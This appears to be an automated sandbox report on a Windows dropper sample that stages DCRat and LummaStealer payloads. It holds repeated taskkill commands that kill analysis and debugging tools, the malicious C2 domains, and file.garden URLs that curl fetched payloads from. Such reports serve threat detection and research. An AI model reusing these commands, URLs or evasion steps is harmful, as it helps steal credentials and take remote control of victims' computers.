                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im HTTPDebuggerUI.exe
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im FortniteClient-Win64-Shipping.exe
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im EpicGamesLauncher.exe
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im HTTPDebuggerSvc.exe
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im FortniteClient-Win64-Shipping.exe
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im EpicGamesLauncher.exe
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im FortniteClient-Win64-Shipping.exe
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im EpicGamesLauncher.exe
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im FortniteClient-Win64-Shipping.exe
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /FI "IMAGENAME eq x64dbg*" /IM * /F /T
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im EpicGamesLauncher.exe
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /FI "IMAGENAME eq x32dbg*" /IM * /F /T
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im FortniteClient-Win64-Shipping.exe
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /FI "IMAGENAME eq ollydbg*" /IM * /F /T
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im EpicGamesLauncher.exe
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /FI "IMAGENAME eq fiddler*" /IM * /F /T
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im FortniteClient-Win64-Shipping.exe
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /FI "IMAGENAME eq fiddler*" /IM * /F /T
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im EpicGamesLauncher.exe
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /FI "IMAGENAME eq charles*" /IM * /F /T
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im FortniteClient-Win64-Shipping.exe
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im EpicGamesLauncher.exe
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /FI "IMAGENAME eq ida*" /IM * /F /T
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im FortniteClient-Win64-Shipping.exe
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im EpicGamesLauncher.exe
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im FortniteClient-Win64-Shipping.exe
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im EpicGamesLauncher.exe
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im FortniteClient-Win64-Shipping.exe
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im EpicGamesLauncher.exe
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im HTTPDebuggerUI.exe
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im FortniteClient-Win64-Shipping.exe
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im HTTPDebuggerSvc.exe
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im EpicGamesLauncher.exe
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im FortniteClient-Win64-Shipping.exe
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im EpicGamesLauncher.exe
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im FortniteClient-Win64-Shipping.exe
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im EpicGamesLauncher.exe
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T
                                Source: C:\Windows\Speech\kdmapper.exeCode function: 52_2_00EDF654 cpuid 52_2_00EDF654
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeCode function: GetLocaleInfoEx,FormatMessageA,0_2_00007FF60C48267C
                                Source: C:\Windows\Speech\imxyvi.exeCode function: GetLocaleInfoEx,FormatMessageA,28_2_00007FF6A953A33C
                                Source: C:\Windows\Speech\kdmapper.exeCode function: GetLocaleInfoW,GetNumberFormatW,52_2_00EDAF0F
                                Source: C:\Windows\Speech\physmeme.exeQueries volume information: C:\Windows\Speech\physmeme.exe VolumeInformationJump to behavior
                                Source: C:\Windows\Speech\rtcore64.exeQueries volume information: C:\Windows\Speech\rtcore64.exe VolumeInformation
                                Source: C:\Edge\msedge.exeQueries volume information: C:\Edge\msedge.exe VolumeInformation
                                Source: C:\Edge\msedge.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeCode function: 0_2_00007FF60C483944 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00007FF60C483944
                                Source: C:\Windows\Speech\kdmapper.exeCode function: 52_2_00ECB146 GetVersionExW,52_2_00ECB146
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                                Source: Amcache.hve.46.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
                                Source: Amcache.hve.46.drBinary or memory string: msmpeng.exe
                                Source: Amcache.hve.46.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
                                Source: Amcache.hve.46.drBinary or memory string: MsMpEng.exe

                                Stealing of Sensitive Information

                                barindex
                                Source: Yara matchFile source: 000000A1.00000002.1813420320.0000000012AC9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: Process Memory Space: msedge.exe PID: 7484, type: MEMORYSTR
                                Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                                Source: Yara matchFile source: 52.3.kdmapper.exe.63c66cf.0.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 52.3.kdmapper.exe.63c66cf.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 52.3.kdmapper.exe.4c616cf.1.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 161.0.msedge.exe.5f0000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 000000A1.00000000.1655201079.00000000005F2000.00000002.00000001.01000000.00000010.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000034.00000003.1471509432.0000000006378000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000034.00000003.1474597690.0000000004C13000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: C:\Users\user\AppData\Local\winlogon.exe, type: DROPPED
                                Source: Yara matchFile source: C:\Windows\Speech\kdmapper.exe, type: DROPPED
                                Source: Yara matchFile source: C:\Edge\msedge.exe, type: DROPPED
                                Source: Yara matchFile source: 52.3.kdmapper.exe.63c66cf.0.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 52.3.kdmapper.exe.63c66cf.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 52.3.kdmapper.exe.4c616cf.1.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 161.0.msedge.exe.5f0000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: C:\Users\user\AppData\Local\winlogon.exe, type: DROPPED
                                Source: Yara matchFile source: C:\Windows\Speech\kdmapper.exe, type: DROPPED
                                Source: Yara matchFile source: C:\Edge\msedge.exe, type: DROPPED

                                Remote Access Functionality

                                barindex
                                Source: Yara matchFile source: 000000A1.00000002.1813420320.0000000012AC9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: Process Memory Space: msedge.exe PID: 7484, type: MEMORYSTR
                                Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                                Source: Yara matchFile source: 52.3.kdmapper.exe.63c66cf.0.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 52.3.kdmapper.exe.63c66cf.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 52.3.kdmapper.exe.4c616cf.1.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 161.0.msedge.exe.5f0000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 000000A1.00000000.1655201079.00000000005F2000.00000002.00000001.01000000.00000010.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000034.00000003.1471509432.0000000006378000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000034.00000003.1474597690.0000000004C13000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: C:\Users\user\AppData\Local\winlogon.exe, type: DROPPED
                                Source: Yara matchFile source: C:\Windows\Speech\kdmapper.exe, type: DROPPED
                                Source: Yara matchFile source: C:\Edge\msedge.exe, type: DROPPED
                                Source: Yara matchFile source: 52.3.kdmapper.exe.63c66cf.0.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 52.3.kdmapper.exe.63c66cf.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 52.3.kdmapper.exe.4c616cf.1.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 161.0.msedge.exe.5f0000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: C:\Users\user\AppData\Local\winlogon.exe, type: DROPPED
                                Source: Yara matchFile source: C:\Windows\Speech\kdmapper.exe, type: DROPPED
                                Source: Yara matchFile source: C:\Edge\msedge.exe, type: DROPPED
                                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                                Gather Victim Identity Information11
                                Scripting
                                Valid Accounts11
                                Windows Management Instrumentation
                                11
                                Scripting
                                1
                                DLL Side-Loading
                                111
                                Disable or Modify Tools
                                11
                                Input Capture
                                1
                                System Time Discovery
                                Remote Services11
                                Archive Collected Data
                                2
                                Ingress Tool Transfer
                                Exfiltration Over Other Network MediumAbuse Accessibility Features
                                CredentialsDomainsDefault Accounts2
                                Command and Scripting Interpreter
                                1
                                DLL Side-Loading
                                1
                                Windows Service
                                111
                                Deobfuscate/Decode Files or Information
                                LSASS Memory3
                                File and Directory Discovery
                                Remote Desktop Protocol1
                                Screen Capture
                                21
                                Encrypted Channel
                                Exfiltration Over BluetoothNetwork Denial of Service
                                Email AddressesDNS ServerDomain Accounts1
                                Scheduled Task/Job
                                1
                                Windows Service
                                411
                                Process Injection
                                4
                                Obfuscated Files or Information
                                Security Account Manager37
                                System Information Discovery
                                SMB/Windows Admin Shares11
                                Input Capture
                                3
                                Non-Application Layer Protocol
                                Automated ExfiltrationData Encrypted for Impact
                                Employee NamesVirtual Private ServerLocal Accounts1
                                Service Execution
                                1
                                Scheduled Task/Job
                                1
                                Scheduled Task/Job
                                14
                                Software Packing
                                NTDS331
                                Security Software Discovery
                                Distributed Component Object Model2
                                Clipboard Data
                                114
                                Application Layer Protocol
                                Traffic DuplicationData Destruction
                                Gather Victim Network InformationServerCloud Accounts1
                                PowerShell
                                21
                                Registry Run Keys / Startup Folder
                                21
                                Registry Run Keys / Startup Folder
                                1
                                DLL Side-Loading
                                LSA Secrets1
                                Process Discovery
                                SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts131
                                Masquerading
                                Cached Domain Credentials131
                                Virtualization/Sandbox Evasion
                                VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items131
                                Virtualization/Sandbox Evasion
                                DCSync1
                                Application Window Discovery
                                Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job411
                                Process Injection
                                Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                                Hide Legend

                                Legend:

                                • Process
                                • Signature
                                • Created File
                                • DNS/IP Info
                                • Is Dropped
                                • Is Windows Process
                                • Number of created Registry Values
                                • Number of created Files
                                • Visual Basic
                                • Delphi
                                • Java
                                • .Net C# or VB.NET
                                • C, C++ or other language
                                • Is malicious
                                • Internet
                                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1522826 Sample: UY9hUZn4CQ.exe Startdate: 30/09/2024 Architecture: WINDOWS Score: 100 78 zelensky.top 2->78 80 writekdmsnu.site 2->80 82 20 other IPs or domains 2->82 96 Suricata IDS alerts for network traffic 2->96 98 Found malware configuration 2->98 100 Antivirus detection for dropped file 2->100 102 17 other signatures 2->102 10 UY9hUZn4CQ.exe 2 2->10         started        signatures3 process4 signatures5 114 Tries to detect sandboxes and other dynamic analysis tools (window names) 10->114 116 Drops executables to the windows directory (C:\Windows) and starts them 10->116 118 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 10->118 120 Excessive usage of taskkill to terminate processes 10->120 13 kdmapper.exe 10->13         started        17 rtcore64.exe 10->17         started        19 physmeme.exe 2 10->19         started        21 83 other processes 10->21 process6 file7 72 C:dge\msedge.exe, PE32 13->72 dropped 74 C:dge\L6lFlVnd0szYUYb26bZc.vbe, data 13->74 dropped 122 Antivirus detection for dropped file 13->122 124 Multi AV Scanner detection for dropped file 13->124 126 Machine Learning detection for dropped file 13->126 23 wscript.exe 13->23         started        76 C:\Users\user\AppData\Roaming\msvcp110.dll, PE32 17->76 dropped 128 Detected unpacking (changes PE section rights) 17->128 130 Writes to foreign memory regions 17->130 132 Allocates memory in foreign processes 17->132 26 aspnet_regiis.exe 17->26         started        29 conhost.exe 17->29         started        134 Contains functionality to inject code into remote processes 19->134 136 Injects a PE file into a foreign processes 19->136 138 LummaC encrypted strings found 19->138 31 RegAsm.exe 19->31         started        33 conhost.exe 19->33         started        140 Uses schtasks.exe or at.exe to add and modify task schedules 21->140 142 Excessive usage of taskkill to terminate processes 21->142 35 curl.exe 2 21->35         started        38 curl.exe 2 21->38         started        40 curl.exe 21->40         started        42 80 other processes 21->42 signatures8 process9 dnsIp10 112 Windows Scripting host queries suspicious COM object (likely to drop second stage) 23->112 44 cmd.exe 23->44         started        84 underlinemdsj.site 104.21.1.169, 443, 49728 CLOUDFLARENETUS United States 26->84 86 explorationmsn.store 188.114.96.3, 443, 49726 CLOUDFLARENETUS European Union 26->86 88 offeviablwke.site 172.67.197.40, 443, 49719, 49733 CLOUDFLARENETUS United States 31->88 90 steamcommunity.com 104.102.49.254, 443, 49715, 49732 AKAMAI-ASUS United States 31->90 92 file.garden 188.114.97.3, 443, 49708, 49711 CLOUDFLARENETUS European Union 35->92 94 127.0.0.1 unknown unknown 35->94 64 C:\Windows\Speech\imxyvi.exe, PE32+ 35->64 dropped 66 C:\Windows\Speech\physmeme.exe, PE32 38->66 dropped 68 C:\Windows\Speech\kdmapper.exe, PE32 40->68 dropped 70 C:\Windows\Speech\rtcore64.exe, PE32 42->70 dropped 46 WerFault.exe 42->46         started        48 Conhost.exe 42->48         started        file11 signatures12 process13 process14 50 msedge.exe 44->50         started        54 conhost.exe 44->54         started        file15 56 C:\Users\user\Desktop\oLoCRyrD.log, PE32 50->56 dropped 58 C:\Users\user\Desktop\XEXXxLMp.log, PE32 50->58 dropped 60 C:\Users\user\Desktop\QGjYUwSA.log, PE32 50->60 dropped 62 4 other malicious files 50->62 dropped 104 Antivirus detection for dropped file 50->104 106 Multi AV Scanner detection for dropped file 50->106 108 Creates an undocumented autostart registry key 50->108 110 3 other signatures 50->110 signatures16

                                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                                windows-stand
                                SourceDetectionScannerLabelLink
                                UY9hUZn4CQ.exe34%ReversingLabsWin32.Trojan.Generic
                                SourceDetectionScannerLabelLink
                                C:\Users\user\AppData\Local\winlogon.exe100%AviraHEUR/AGEN.1323342
                                C:\Users\user\Desktop\oLoCRyrD.log100%AviraTR/AVI.Agent.updqb
                                C:\Windows\Speech\rtcore64.exe100%AviraHEUR/AGEN.1352236
                                C:\Edge\L6lFlVnd0szYUYb26bZc.vbe100%AviraVBS/Runner.VPG
                                C:\Windows\Speech\kdmapper.exe100%AviraVBS/Runner.VPG
                                C:\Users\user\AppData\Local\Temp\LZthEGCsKS.bat100%AviraBAT/Delbat.C
                                C:\Users\user\Desktop\QGjYUwSA.log100%AviraTR/PSW.Agent.qngqt
                                C:\Edge\msedge.exe100%AviraHEUR/AGEN.1323342
                                C:\Users\user\AppData\Local\winlogon.exe100%Joe Sandbox ML
                                C:\Windows\Speech\rtcore64.exe100%Joe Sandbox ML
                                C:\Users\user\Desktop\XEXXxLMp.log100%Joe Sandbox ML
                                C:\Windows\Speech\kdmapper.exe100%Joe Sandbox ML
                                C:\Users\user\Desktop\MQshNARH.log100%Joe Sandbox ML
                                C:\Users\user\Desktop\QGjYUwSA.log100%Joe Sandbox ML
                                C:\Users\user\AppData\Roaming\msvcp110.dll100%Joe Sandbox ML
                                C:\Edge\msedge.exe100%Joe Sandbox ML
                                C:\Edge\msedge.exe74%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                C:\Users\user\AppData\Local\winlogon.exe74%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                C:\Users\user\Desktop\ITDiARjW.log29%ReversingLabs
                                C:\Users\user\Desktop\MQshNARH.log8%ReversingLabs
                                C:\Users\user\Desktop\QGjYUwSA.log71%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                C:\Users\user\Desktop\XEXXxLMp.log25%ReversingLabsWin32.Trojan.Generic
                                C:\Users\user\Desktop\oLoCRyrD.log17%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                C:\Windows\Speech\imxyvi.exe71%ReversingLabsWin64.Trojan.Generic
                                C:\Windows\Speech\kdmapper.exe68%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                C:\Windows\Speech\physmeme.exe61%ReversingLabsByteCode-MSIL.Trojan.LummaStealer
                                No Antivirus matches
                                No Antivirus matches
                                No Antivirus matches
                                NameIPActiveMaliciousAntivirus DetectionReputation
                                offeviablwke.site
                                172.67.197.40
                                truetrue
                                  steamcommunity.com
                                  104.102.49.254
                                  truefalse
                                    file.garden
                                    188.114.97.3
                                    truefalse
                                      underlinemdsj.site
                                      104.21.1.169
                                      truetrue
                                        explorationmsn.store
                                        188.114.96.3
                                        truetrue
                                          fossillargeiw.shop
                                          unknown
                                          unknowntrue
                                            possiwreeste.site
                                            unknown
                                            unknowntrue
                                              commandejorsk.site
                                              unknown
                                              unknowntrue
                                                strappystyio.shop
                                                unknown
                                                unknowntrue
                                                  famikyjdiag.site
                                                  unknown
                                                  unknowntrue
                                                    writekdmsnu.site
                                                    unknown
                                                    unknowntrue
                                                      agentyanlark.site
                                                      unknown
                                                      unknowntrue
                                                        tiddymarktwo.shop
                                                        unknown
                                                        unknowntrue
                                                          coursedonnyre.shop
                                                          unknown
                                                          unknowntrue
                                                            surveriysiop.shop
                                                            unknown
                                                            unknowntrue
                                                              delaylacedmn.site
                                                              unknown
                                                              unknowntrue
                                                                bellykmrebk.site
                                                                unknown
                                                                unknowntrue
                                                                  captainynfanw.shop
                                                                  unknown
                                                                  unknowntrue
                                                                    tearrybyiwo.shop
                                                                    unknown
                                                                    unknowntrue
                                                                      zelensky.top
                                                                      unknown
                                                                      unknowntrue
                                                                        appleboltelwk.shop
                                                                        unknown
                                                                        unknowntrue
                                                                          tendencerangej.shop
                                                                          unknown
                                                                          unknowntrue
                                                                            NameMaliciousAntivirus DetectionReputation
                                                                            commandejorsk.sitetrue
                                                                              https://file.garden/ZmE_ziOgiFXI9Y48/kdmapper.binfalse
                                                                                https://offeviablwke.site/apitrue
                                                                                  agentyanlark.sitetrue
                                                                                    underlinemdsj.sitetrue
                                                                                      possiwreeste.sitetrue
                                                                                        https://steamcommunity.com/profiles/76561199724331900false
                                                                                          https://file.garden/ZmE_ziOgiFXI9Y48/build.binfalse
                                                                                            https://file.garden/ZmE_ziOgiFXI9Y48/physmeme.binfalse
                                                                                              bellykmrebk.sitetrue
                                                                                                https://underlinemdsj.site/apitrue
                                                                                                  NameSourceMaliciousAntivirus DetectionReputation
                                                                                                  https://player.vimeo.comaspnet_regiis.exe, 00000049.00000003.1565373079.0000000000947000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    https://famikyjdiag.site/l1aspnet_regiis.exe, 00000049.00000003.1535168990.0000000000948000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      https://store.steampowered.com/;Persistent-AuthWWW-AuthenticateVarysteamCountry=US%7Cd7fb65801182a5faspnet_regiis.exe, 00000049.00000003.1565373079.0000000000947000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        https://steamcommunity.com/?subsection=broadcastsaspnet_regiis.exe, 00000049.00000003.1565282474.0000000000985000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1575351683.000000000098D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          https://famikyjdiag.site/d1aspnet_regiis.exe, 00000049.00000003.1535168990.0000000000948000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            https://bellykmrebk.site/apiiaspnet_regiis.exe, 00000049.00000003.1549985382.0000000000930000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1550070682.0000000000947000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              https://community.akamai.steamstatic.com/public/javascript/webui/clientcom.js?v=B0lGn8MokmdT&amp;l=easpnet_regiis.exe, 00000049.00000003.1565282474.0000000000985000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1575351683.000000000098D000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1565282474.000000000097E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                https://store.steampowered.com/subscriber_agreement/aspnet_regiis.exe, 00000049.00000003.1565282474.0000000000985000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1575351683.000000000098D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  https://www.gstatic.cn/recaptcha/aspnet_regiis.exe, 00000049.00000003.1565373079.0000000000947000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6aspnet_regiis.exe, 00000049.00000002.1577126857.0000000000903000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1565282474.0000000000985000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1575351683.000000000098D000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1565282474.000000000097E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                      http://www.valvesoftware.com/legal.htmaspnet_regiis.exe, 00000049.00000003.1565282474.0000000000985000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1575351683.000000000098D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        https://file.garden/ZmE_ziOgiFXI9Y48/build.bin6curl.exe, 00000037.00000003.1493561295.000002E955E79000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000037.00000002.1497355891.000002E955E7A000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000037.00000003.1493649612.000002E955E7A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                          https://www.youtube.comaspnet_regiis.exe, 00000049.00000003.1565373079.0000000000947000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                            https://community.akamai.steamstatic.com/public/css/promo/summer2017/stickers.css?v=HA2Yr5oy3FFG&ampaspnet_regiis.exe, 00000049.00000003.1565282474.0000000000985000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1575351683.000000000098D000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1565282474.000000000097E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              https://community.akamai.steamstatic.com/public/shared/images/responsive/logo_valve_footer.pngaspnet_regiis.exe, 00000049.00000003.1565282474.0000000000985000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1575351683.000000000098D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                https://file.garden/ZmE_ziOgiFXI9Y48/physmeme.bin9Acurl.exe, 0000001F.00000003.1395366258.000001EC889D9000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000001F.00000003.1395437445.000001EC889DA000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000001F.00000002.1397126681.000001EC889DA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                  https://www.google.comaspnet_regiis.exe, 00000049.00000003.1565373079.0000000000947000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                    https://community.akamai.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.pngaspnet_regiis.exe, 00000049.00000003.1565282474.0000000000985000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1575351683.000000000098D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                      https://famikyjdiag.site/aspnet_regiis.exe, 00000049.00000003.1535168990.0000000000948000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                        https://community.akamai.steamstatic.com/public/shared/css/shared_responsive.css?v=sHIIcMzCffX6&amp;aspnet_regiis.exe, 00000049.00000003.1565282474.0000000000985000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1575351683.000000000098D000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1565282474.000000000097E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                          https://file.garden/ZmE_ziOgiFXI9Y48/build.bin--outputC:curl.exe, 00000037.00000002.1497161944.000002E955E40000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                            https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedbackaspnet_regiis.exe, 00000049.00000003.1565282474.0000000000985000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1575351683.000000000098D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                              https://commandejorsk.site/L1_aspnet_regiis.exe, 00000049.00000003.1549985382.0000000000930000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1550070682.0000000000947000.00000004.00000020.00020000.00000000.sdmpfalse
